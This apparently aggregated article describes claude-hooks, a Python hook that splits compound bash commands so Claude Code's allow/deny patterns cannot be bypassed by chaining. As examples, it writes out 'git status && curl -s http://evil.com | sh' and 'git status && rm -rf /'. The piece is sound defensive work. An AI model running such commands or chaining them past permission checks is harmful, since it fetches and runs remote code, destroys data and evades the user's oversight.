Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass
Security Gap in Claude Code's Permission System
Claude Code's permission system has a vulnerability where compound bash commands can bypass allow/deny patterns. When you allow a command like Bash(git status:*), Claude Code matches the entire command string against that pattern. This means a compound command like git status && curl -s http://evil.com | sh would match git status* and get auto-approved, even though it chains in curl and sh commands.
The Solution: claude-hooks
The fix is a single Python script called claude-hooks that runs as a PreToolUse hook. It performs several key functions:
- Decomposes compound commands by splitting on
&&,||,;,|, newlines, and extracts$()and backtick subshell contents recursively - Normalizes each sub-command by stripping env var prefixes, I/O redirections, heredoc bodies, and shell keywords
- Checks each sub-command individually against your existing
permissions.allowandpermissions.denypatterns - Deny wins — if any sub-command matches a deny pattern, the whole command is denied
- All must allow — auto-approve only happens when every sub-command matches an allow pattern
- Falls through gracefully — if any sub-command is unknown, you still get the normal permission prompt
Setup Instructions
Installation takes about 30 seconds:
curl -fsSL -o ~/.claude/hooks/smart_approve.py \
https://raw.githubusercontent.com/liberzon/claude-hooks/main/smart_approve.pyAdd to ~/.claude/settings.json:
{
"hooks": {
"PreToolUse": [
{
"matcher": "Bash",
"hooks": [
{
"type": "command",
"command": "python3 ~/.claude/hooks/smart_approve.py"
}
]
}
]
}
}The tool has no dependencies beyond Python 3 and requires zero configuration — it reads your existing permission patterns.
Example Behavior
git status: Allowed both with and without hookgit add . && git commit -m "msg": Allowed both with and without hook (both matchgit *)git status && rm -rf /: Allowed without hook, prompt shown with hook (rm -rf /has no allow)`npm test | tee output.log`: AllowedFOO=bar git push: Might not match without hook, allowed with hook (env var stripped)
The repository is available at https://github.com/liberzon/claude-hooks under MIT license.
📖 Read the full source: r/ClaudeAI
👀 See Also
Architectural fix for AI agent over-centralization: separating memory, execution, and outbound actions
A developer realized their AI assistant was becoming an 'internal autocrat' by handling long-term memory, tool access, and autonomous decisions in one component. The solution involved separating the system into three roles: private controller, scoped workers, and outbound gate.
Student contributes two security patches to OpenClaw production system
A student developer fixed a 'fail-open' vulnerability in OpenClaw's gateway logic (PR #29198) and a tabnabbing vulnerability in chat images (PR #18685), with both patches landing in production releases v2026.3.1 and v2026.2.24 respectively.
Caelguard: Open-Source Security Scanner for OpenClaw Instances
Caelguard is an open-source security scanner built for OpenClaw that runs 22 checks across your instance, including Docker isolation, tool permission scoping, and skill supply chain verification. It provides a score out of 140 with a letter grade and specific remediation steps.
llm-hasher: Local PII Detection and Tokenization for Hybrid LLM Workflows
llm-hasher is a tool that detects personally identifiable information locally using Ollama before data reaches external LLMs like OpenAI or Claude, tokenizes the PII, and restores originals after processing. It uses regex for structured data types and a local LLM for contextual detection, with encrypted storage for mappings.